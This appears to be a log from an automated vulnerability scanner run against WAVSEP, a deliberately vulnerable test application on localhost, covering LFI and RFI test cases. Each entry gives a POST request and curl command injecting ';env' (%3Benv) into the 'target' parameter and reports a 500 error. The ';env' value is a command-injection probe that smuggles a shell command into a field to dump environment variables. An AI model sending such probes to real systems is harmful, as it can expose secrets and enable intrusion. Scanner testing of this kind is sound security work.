curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
